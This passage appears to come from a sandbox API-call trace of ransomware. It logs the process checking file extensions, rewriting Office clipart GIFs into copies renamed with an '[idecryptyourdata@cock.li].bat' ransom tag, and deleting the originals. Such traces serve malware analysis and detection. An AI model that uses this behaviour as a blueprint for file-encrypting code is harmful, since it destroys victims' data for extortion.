Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 68 [0060.462] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 68 [0060.462] lstrlenW (lpString=".doc") returned 4 [0060.462] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0060.462] lstrlenW (lpString=".docx") returned 5 [0060.462] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0060.462] lstrlenW (lpString=".pdf") returned 4 [0060.462] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0060.462] lstrlenW (lpString=".xls") returned 4 [0060.462] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0060.462] lstrlenW (lpString=".xlsx") returned 5 [0060.462] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0060.462] lstrlenW (lpString=".ppt") returned 4 [0060.462] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0060.462] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 68 [0060.462] lstrlenW (lpString=".zip") returned 4 [0060.462] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0060.462] lstrlenW (lpString=".rar") returned 4 [0060.462] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0060.462] lstrlenW (lpString=".bz2") returned 4 [0060.462] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0060.462] lstrlenW (lpString=".7z") returned 3 [0060.462] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0060.462] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 68 [0060.462] lstrlenW (lpString=".dbf") returned 4 [0060.462] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0060.462] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 68 [0060.462] lstrlenW (lpString=".1cd") returned 4 [0060.462] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0060.462] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 68 [0060.462] lstrlenW (lpString=".jpg") returned 4 [0060.462] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0060.463] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 68 [0060.463] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 68 [0060.463] lstrlenW (lpString=".doc") returned 4 [0060.463] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0060.463] lstrlenW (lpString=".docx") returned 5 [0060.463] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0060.463] lstrlenW (lpString=".pdf") returned 4 [0060.463] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0060.463] lstrlenW (lpString=".xls") returned 4 [0060.463] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0060.463] lstrlenW (lpString=".xlsx") returned 5 [0060.463] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0060.463] lstrlenW (lpString=".ppt") returned 4 [0060.463] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0060.463] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 68 [0060.463] lstrlenW (lpString=".zip") returned 4 [0060.463] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0060.463] lstrlenW (lpString=".rar") returned 4 [0060.463] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0060.463] lstrlenW (lpString=".bz2") returned 4 [0060.463] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0060.463] lstrlenW (lpString=".7z") returned 3 [0060.463] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0060.463] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 68 [0060.463] lstrlenW (lpString=".dbf") returned 4 [0060.463] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0060.463] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 68 [0060.463] lstrlenW (lpString=".1cd") returned 4 [0060.463] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0060.463] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 68 [0060.463] lstrlenW (lpString=".jpg") returned 4 [0060.463] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0060.464] lstrcmpiW (lpString1=".GIF", lpString2=".bat") returned 1 [0060.464] lstrlenW (lpString="AG00092_.GIF") returned 12 [0060.464] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00092_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0060.464] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=502) returned 1 [0060.464] CloseHandle (hObject=0x358) returned 1 [0060.464] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00092_.gif")) returned 0x220 [0060.464] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00092_.gif.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0060.464] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00092_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0060.464] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0060.464] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0060.464] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00092_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0060.465] GetLastError () returned 0x0 [0060.465] ReadFile (in: hFile=0x358, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x1f6, lpOverlapped=0x0) returned 1 [0060.466] WriteFile (in: hFile=0x350, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x200, lpOverlapped=0x0) returned 1 [0060.466] ReadFile (in: hFile=0x358, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0060.466] WriteFile (in: hFile=0x350, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0060.469] SetEndOfFile (hFile=0x350) returned 1 [0060.469] CloseHandle (hObject=0x350) returned 1 [0060.469] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0060.469] SetEndOfFile (hFile=0x358) returned 1 [0060.470] CloseHandle (hObject=0x358) returned 1 [0060.470] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0060.470] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00092_.gif")) returned 1 [0060.471] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 68 [0060.471] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 68 [0060.471] lstrlenW (lpString=".doc") returned 4 [0060.471] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0060.471] lstrlenW (lpString=".docx") returned 5 [0060.471] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0060.471] lstrlenW (lpString=".pdf") returned 4 [0060.471] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0060.471] lstrlenW (lpString=".xls") returned 4 [0060.471] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0060.471] lstrlenW (lpString=".xlsx") returned 5 [0060.471] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0060.471] lstrlenW (lpString=".ppt") returned 4 [0060.471] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0060.471] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 68 [0060.471] lstrlenW (lpString=".zip") returned 4 [0060.471] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0060.471] lstrlenW (lpString=".rar") returned 4 [0060.471] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0060.471] lstrlenW (lpString=".bz2") returned 4 [0060.471] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0060.471] lstrlenW (lpString=".7z") returned 3 [0060.471] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0060.471] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 68 [0060.471] lstrlenW (lpString=".dbf") returned 4 [0060.471] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0060.471] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 68 [0060.471] lstrlenW (lpString=".1cd") returned 4 [0060.471] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0060.471] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 68 [0060.472] lstrlenW (lpString=".jpg") returned 4 [0060.472] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0060.472] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 68 [0060.472] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 68 [0060.472] lstrlenW (lpString=".doc") returned 4 [0060.472] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0060.472] lstrlenW (lpString=".docx") returned 5 [0060.472] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0060.472] lstrlenW (lpString=".pdf") returned 4 [0060.472] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0060.472] lstrlenW (lpString=".xls") returned 4 [0060.472] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0060.472] lstrlenW (lpString=".xlsx") returned 5 [0060.472] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0060.472] lstrlenW (lpString=".ppt") returned 4 [0060.472] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0060.472] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 68 [0060.472] lstrlenW (lpString=".zip") returned 4 [0060.472] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0060.472] lstrlenW (lpString=".rar") returned 4 [0060.472] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0060.472] lstrlenW (lpString=".bz2") returned 4 [0060.472] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0060.472] lstrlenW (lpString=".7z") returned 3 [0060.472] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0060.472] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 68 [0060.472] lstrlenW (lpString=".dbf") returned 4 [0060.472] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0060.472] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 68 [0060.472] lstrlenW (lpString=".1cd") returned 4 [0060.472] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0060.472] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 68 [0060.472] lstrlenW (lpString=".jpg") returned 4 [0060.472] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0060.473] lstrcmpiW (lpString1=".GIF", lpString2=".bat") returned 1 [0060.473] lstrlenW (lpString="AG00103_.GIF") returned 12 [0060.473] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00103_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0060.473] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=12702) returned 1 [0060.473] CloseHandle (hObject=0x358) returned 1 [0060.476] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00103_.gif")) returned 0x220 [0060.476] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00103_.gif.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0060.476] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00103_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0060.476] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0060.476] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0060.476] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00103_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0060.476] GetLastError () returned 0x0 [0060.476] ReadFile (in: hFile=0x358, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x319e, lpOverlapped=0x0) returned 1 [0060.534] WriteFile (in: hFile=0x350, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x31a0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x31a0, lpOverlapped=0x0) returned 1 [0060.535] ReadFile (in: hFile=0x358, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0060.535] WriteFile (in: hFile=0x350, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0060.535] SetEndOfFile (hFile=0x350) returned 1 [0060.535] CloseHandle (hObject=0x350) returned 1 [0060.536] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0060.536] SetEndOfFile (hFile=0x358) returned 1 [0060.537] CloseHandle (hObject=0x358) returned 1 [0060.537] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0060.537] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00103_.gif")) returned 1 [0060.537] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 68 [0060.537] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 68 [0060.537] lstrlenW (lpString=".doc") returned 4 [0060.538] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0060.538] lstrlenW (lpString=".docx") returned 5 [0060.538] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0060.538] lstrlenW (lpString=".pdf") returned 4 [0060.538] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0060.538] lstrlenW (lpString=".xls") returned 4 [0060.538] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0060.538] lstrlenW (lpString=".xlsx") returned 5 [0060.538] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0060.538] lstrlenW (lpString=".ppt") returned 4 [0060.538] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0060.538] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 68 [0060.538] lstrlenW (lpString=".zip") returned 4 [0060.538] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0060.538] lstrlenW (lpString=".rar") returned 4 [0060.538] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0060.538] lstrlenW (lpString=".bz2") returned 4 [0060.538] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0060.538] lstrlenW (lpString=".7z") returned 3 [0060.538] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0060.538] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 68 [0060.538] lstrlenW (lpString=".dbf") returned 4 [0060.538] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0060.538] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 68 [0060.538] lstrlenW (lpString=".1cd") returned 4 [0060.538] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0060.538] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 68 [0060.538] lstrlenW (lpString=".jpg") returned 4 [0060.538] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0060.538] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 68 [0060.538] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 68 [0060.538] lstrlenW (lpString=".doc") returned 4 [0060.538] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0060.538] lstrlenW (lpString=".docx") returned 5 [0060.538] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0060.538] lstrlenW (lpString=".pdf") returned 4 [0060.539] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0060.539] lstrlenW (lpString=".xls") returned 4 [0060.539] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0060.539] lstrlenW (lpString=".xlsx") returned 5 [0060.539] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0060.539] lstrlenW (lpString=".ppt") returned 4 [0060.539] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0060.539] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 68 [0060.539] lstrlenW (lpString=".zip") returned 4 [0060.539] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0060.539] lstrlenW (lpString=".rar") returned 4 [0060.539] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0060.539] lstrlenW (lpString=".bz2") returned 4 [0060.539] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0060.539] lstrlenW (lpString=".7z") returned 3 [0060.539] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0060.539] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 68 [0060.539] lstrlenW (lpString=".dbf") returned 4 [0060.539] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0060.539] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 68 [0060.539] lstrlenW (lpString=".1cd") returned 4 [0060.539] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0060.539] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 68 [0060.539] lstrlenW (lpString=".jpg") returned 4 [0060.539] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0060.539] lstrcmpiW (lpString1=".GIF", lpString2=".bat") returned 1 [0060.539] lstrlenW (lpString="AG00120_.GIF") returned 12 [0060.539] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00120_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0060.540] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=3484) returned 1 [0060.540] CloseHandle (hObject=0x358) returned 1 [0060.540] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00120_.gif")) returned 0x220 [0060.540] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00120_.gif.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0060.540] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00120_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0060.540] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0060.540] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0060.540] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00120_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0060.540] GetLastError () returned 0x0 [0060.541] ReadFile (in: hFile=0x358, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0xd9c, lpOverlapped=0x0) returned 1 [0060.850] WriteFile (in: hFile=0x350, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xda0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xda0, lpOverlapped=0x0) returned 1 [0060.851] ReadFile (in: hFile=0x358, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0060.851] WriteFile (in: hFile=0x350, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0060.851] SetEndOfFile (hFile=0x350) returned 1 [0060.852] CloseHandle (hObject=0x350) returned 1 [0060.852] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0060.852] SetEndOfFile (hFile=0x358) returned 1 [0060.853] CloseHandle (hObject=0x358) returned 1 [0060.853] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0060.854] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00120_.gif")) returned 1 [0060.854] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 68 [0060.854] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 68 [0060.854] lstrlenW (lpString=".doc") returned 4 [0060.854] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0060.854] lstrlenW (lpString=".docx") returned 5 [0060.854] lstrcmpiW 